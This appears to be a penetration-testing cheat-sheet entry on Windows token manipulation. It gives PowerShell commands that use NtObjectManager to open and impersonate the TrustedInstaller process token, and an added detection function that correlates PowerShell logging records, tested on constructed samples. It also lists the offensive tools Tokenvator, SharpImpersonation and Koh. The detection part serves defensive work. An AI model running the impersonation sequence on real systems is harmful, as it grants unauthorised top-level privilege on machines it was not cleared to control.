Token Manipulation

Trusted Installer Token

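# Install the NtObjectManager module, then restart the service so a TrustedInstaller process exists
PS > Install-Module -Name NtObjectManager -Confirm:$false
PS > Restart-Service TrustedInstaller
# Open the primary token of the TrustedInstaller process
PS > $procId = (Get-Process TrustedInstaller).Id
PS > $token = Get-NtTokenFromProcess -ProcessId $procId
# Impersonate that token on the current thread
PS > $current = Get-NtThread -Current -PseudoHandle
PS > $ctx = $current.Impersonate($token)
# Read back the thread's impersonation token; NT SERVICE\TrustedInstaller in its groups confirms the impersonation took effect
PS > $impToken = Get-NtToken -Impersonation
PS > $impToken.Groups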
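
A detection-side view of the sequence above, as an added example that is not part of the original page or of NtObjectManager: it groups PowerShell script block log records (Event ID 4104) by process, because a per-record match never sees the whole sequence when the commands are typed one at a time. The function name, stage labels and sample records are constructed for illustration, and it assumes script block logging is enabled.

```powershell
# Added example: correlates script block log records (Event ID 4104) per
# PowerShell process, since each interactive line is logged as its own record.
function Find-TrustedInstallerTokenUse {
    param([Parameter(Mandatory)] [object[]] $Record)

    # Stage labels are hypothetical; the patterns come from this page's commands.
    $stages = [ordered]@{
        TargetsService = 'TrustedInstaller'
        OpensToken     = 'Get-NtTokenFromProcess'
        Impersonates   = '\.Impersonate\('
    }

    foreach ($session in ($Record | Group-Object -Property ProcessId)) {
        $seen = [ordered]@{}
        foreach ($r in ($session.Group | Sort-Object -Property TimeCreated)) {
            foreach ($name in $stages.Keys) {
                if (-not $seen.Contains($name) -and
                    $r.ScriptBlockText -match $stages[$name]) {
                    $seen[$name] = $r.TimeCreated
                }
            }
        }
        # Report only when every stage occurred inside the same process.
        if ($seen.Count -eq $stages.Count) {
            $times = @($seen.Values | Sort-Object)
            [pscustomobject]@{
                ProcessId = [int]$session.Name
                FirstSeen = $times[0]
                LastSeen  = $times[-1]
                Stages    = @($seen.Keys) -join ','
            }
        }
    }
}

# Constructed sample records, not real logs. PID 4120 replays this page's
# commands one line per record; PID 5300 only queries the service.
$t = Get-Date '2024-01-01T10:00:00'
$sample = @(
    [pscustomobject]@{ ProcessId = 4120; TimeCreated = $t; ScriptBlockText = '$procId = (Get-Process TrustedInstaller).Id' }
    [pscustomobject]@{ ProcessId = 4120; TimeCreated = $t.AddSeconds(5); ScriptBlockText = '$token = Get-NtTokenFromProcess -ProcessId $procId' }
    [pscustomobject]@{ ProcessId = 4120; TimeCreated = $t.AddSeconds(9); ScriptBlockText = '$ctx = $current.Impersonate($token)' }
    [pscustomobject]@{ ProcessId = 5300; TimeCreated = $t.AddSeconds(2); ScriptBlockText = 'Get-Service TrustedInstaller' }
)
Find-TrustedInstallerTokenUse -Record $sample

# Live input, assuming script block logging is enabled:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     Select-Object ProcessId, TimeCreated, @{ n = 'ScriptBlockText'; e = { $_.Properties[2].Value } }
```

On the sample data only PID 4120 is reported, with all three stages; PID 5300 mentions the service but never opens or impersonates a token.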

Tools

Tokenvator

SharpImpersonation

Koh
